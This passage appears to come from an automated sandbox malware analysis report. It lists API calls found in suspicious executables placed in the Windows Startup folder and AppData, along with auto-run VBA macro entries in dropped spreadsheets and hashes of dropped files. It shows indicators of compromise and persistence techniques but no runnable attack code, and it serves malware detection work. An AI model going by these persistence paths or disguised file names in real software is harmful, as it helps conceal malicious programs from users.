                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F7F37C NtdllDialogWndProc_W,7_2_00F7F37C
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F7F45A ClientToScreen,NtdllDialogWndProc_W,7_2_00F7F45A
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F7F425 NtdllDialogWndProc_W,7_2_00F7F425
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F7F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,7_2_00F7F5D0
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F7F594 GetWindowLongW,NtdllDialogWndProc_W,7_2_00F7F594
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F2B7F2 NtdllDialogWndProc_W,7_2_00F2B7F2
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F2B845 NtdllDialogWndProc_W,7_2_00F2B845
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F7FE80 NtdllDialogWndProc_W,7_2_00F7FE80
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F7FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,7_2_00F7FF91
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F7FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,7_2_00F7FF04
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D629C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,16_2_00D629C2
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DD02AA NtdllDialogWndProc_W,16_2_00DD02AA
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DCE769 NtdllDialogWndProc_W,CallWindowProcW,16_2_00DCE769
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DCEA4E NtdllDialogWndProc_W,16_2_00DCEA4E
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D7AC99 NtdllDialogWndProc_W,16_2_00D7AC99
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DCECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,16_2_00DCECBC
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D7AD5C NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W,16_2_00D7AD5C
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D7AFB4 GetParent,NtdllDialogWndProc_W,16_2_00D7AFB4
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DCEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,16_2_00DCEFA8
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DCF0A1 SendMessageW,NtdllDialogWndProc_W,16_2_00DCF0A1
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DCF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,16_2_00DCF122
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DCF3DA NtdllDialogWndProc_W,16_2_00DCF3DA
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DCF3AB NtdllDialogWndProc_W,16_2_00DCF3AB
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DCF37C NtdllDialogWndProc_W,16_2_00DCF37C
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DCF45A ClientToScreen,NtdllDialogWndProc_W,16_2_00DCF45A
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DCF425 NtdllDialogWndProc_W,16_2_00DCF425
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DCF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,16_2_00DCF5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DCF594 GetWindowLongW,NtdllDialogWndProc_W,16_2_00DCF594
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D7B7F2 NtdllDialogWndProc_W,16_2_00D7B7F2
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D7B845 NtdllDialogWndProc_W,16_2_00D7B845
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DCFE80 NtdllDialogWndProc_W,16_2_00DCFE80
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DCFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,16_2_00DCFF91
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DCFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,16_2_00DCFF04
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F129C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,23_2_00F129C2
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F802AA NtdllDialogWndProc_W,23_2_00F802AA
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F7E769 NtdllDialogWndProc_W,CallWindowProcW,23_2_00F7E769
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F7EA4E NtdllDialogWndProc_W,23_2_00F7EA4E
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F7ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,23_2_00F7ECBC
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F2AC99 NtdllDialogWndProc_W,23_2_00F2AC99
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F2AD5C NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W,23_2_00F2AD5C
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F2AFB4 GetParent,NtdllDialogWndProc_W,23_2_00F2AFB4
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F7EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,23_2_00F7EFA8
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F7F0A1 SendMessageW,NtdllDialogWndProc_W,23_2_00F7F0A1
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F7F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,23_2_00F7F122
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F7F3DA NtdllDialogWndProc_W,23_2_00F7F3DA
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F7F3AB NtdllDialogWndProc_W,23_2_00F7F3AB
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F7F37C NtdllDialogWndProc_W,23_2_00F7F37C
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F7F45A ClientToScreen,NtdllDialogWndProc_W,23_2_00F7F45A
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F7F425 NtdllDialogWndProc_W,23_2_00F7F425
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F7F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,23_2_00F7F5D0
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F7F594 GetWindowLongW,NtdllDialogWndProc_W,23_2_00F7F594
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F2B7F2 NtdllDialogWndProc_W,23_2_00F2B7F2
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F2B845 NtdllDialogWndProc_W,23_2_00F2B845
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F7FE80 NtdllDialogWndProc_W,23_2_00F7FE80
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F7FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,23_2_00F7FF91
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F7FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,23_2_00F7FF04
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F570AE: DeviceIoControl,CloseHandle,7_2_00F570AE
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F4B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,746D5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,7_2_00F4B9F1
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F582D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,7_2_00F582D0
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DA82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,16_2_00DA82D0
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F582D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,23_2_00F582D0
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F22B407_2_00F22B40
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F730AD7_2_00F730AD
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F236807_2_00F23680
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F1DCD07_2_00F1DCD0
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F1A0C07_2_00F1A0C0
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F301837_2_00F30183
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F5220C7_2_00F5220C
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F185307_2_00F18530
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F166707_2_00F16670
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F306777_2_00F30677
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F487797_2_00F48779
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F7A8DC7_2_00F7A8DC
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F30A8F7_2_00F30A8F
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F16BBC7_2_00F16BBC
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F18CA07_2_00F18CA0
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F3AC837_2_00F3AC83
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F2AD5C7_2_00F2AD5C
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F30EC47_2_00F30EC4
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F44EBF7_2_00F44EBF
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F4113E7_2_00F4113E
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F312F97_2_00F312F9
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F4542F7_2_00F4542F
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F7F5D07_2_00F7F5D0
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F4599F7_2_00F4599F
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F3DA747_2_00F3DA74
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F1BDF07_2_00F1BDF0
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F3BDF67_2_00F3BDF6
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F15D327_2_00F15D32
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F31E5A7_2_00F31E5A
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F47FFD7_2_00F47FFD
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F5BFB87_2_00F5BFB8
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F3DF697_2_00F3DF69
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D6DCD016_2_00D6DCD0
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D6A0C016_2_00D6A0C0
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D8018316_2_00D80183
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DA220C16_2_00DA220C
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D6853016_2_00D68530
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D6667016_2_00D66670
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D8067716_2_00D80677
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D9877916_2_00D98779
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DCA8DC16_2_00DCA8DC
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D80A8F16_2_00D80A8F
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D66BBC16_2_00D66BBC
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D8AC8316_2_00D8AC83
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D68CA016_2_00D68CA0
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D7AD5C16_2_00D7AD5C
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D80EC416_2_00D80EC4
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D94EBF16_2_00D94EBF
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DC30AD16_2_00DC30AD
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D9113E16_2_00D9113E
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D812F916_2_00D812F9
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D9542F16_2_00D9542F
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DCF5D016_2_00DCF5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D7368016_2_00D73680
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D9599F16_2_00D9599F
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D8DA7416_2_00D8DA74
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D6BDF016_2_00D6BDF0
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D8BDF616_2_00D8BDF6
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D65D3216_2_00D65D32
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D81E5A16_2_00D81E5A
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D97FFD16_2_00D97FFD
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DABFB816_2_00DABFB8
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D8DF6916_2_00D8DF69
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F1DCD023_2_00F1DCD0
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F1A0C023_2_00F1A0C0
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F3018323_2_00F30183
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F5220C23_2_00F5220C
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F1853023_2_00F18530
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F1667023_2_00F16670
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F3067723_2_00F30677
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F4877923_2_00F48779
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F7A8DC23_2_00F7A8DC
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F30A8F23_2_00F30A8F
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F16BBC23_2_00F16BBC
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F22B4023_2_00F22B40
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F18CA023_2_00F18CA0
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F3AC8323_2_00F3AC83
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F2AD5C23_2_00F2AD5C
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F30EC423_2_00F30EC4
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F44EBF23_2_00F44EBF
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F730AD23_2_00F730AD
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F4113E23_2_00F4113E
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F312F923_2_00F312F9
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F4542F23_2_00F4542F
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F7F5D023_2_00F7F5D0
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F2368023_2_00F23680
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F4599F23_2_00F4599F
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F3DA7423_2_00F3DA74
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F1BDF023_2_00F1BDF0
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F3BDF623_2_00F3BDF6
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F15D3223_2_00F15D32
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F31E5A23_2_00F31E5A
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F47FFD23_2_00F47FFD
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F5BFB823_2_00F5BFB8
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F3DF6923_2_00F3DF69
                              Source: zuYOpErC.xlsm.10.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: zuYOpErC.xlsm.10.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: WUTJSCBCFX.xlsm.10.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: WUTJSCBCFX.xlsm.10.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\RCX8AC4.tmp 5A2B9944F9C900ABFBBF22B605A6D1770FC3C75456FFF3C0517CAA102C5D8F07
                              Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\Synaptics.exe 67D5FC80B6BF87EB6BC3D505B0102CFDF8E8727D3DA004D982467AB08DED7F0B
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FGNEBI[1].exe 67D5FC80B6BF87EB6BC3D505B0102CFDF8E8727D3DA004D982467AB08DED7F0B
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: String function: 00D7F885 appears 67 times
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: String function: 00D87750 appears 42 times
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00F37750 appears 84 times
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00F38AE8 appears 46 times
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00F2F885 appears 134 times
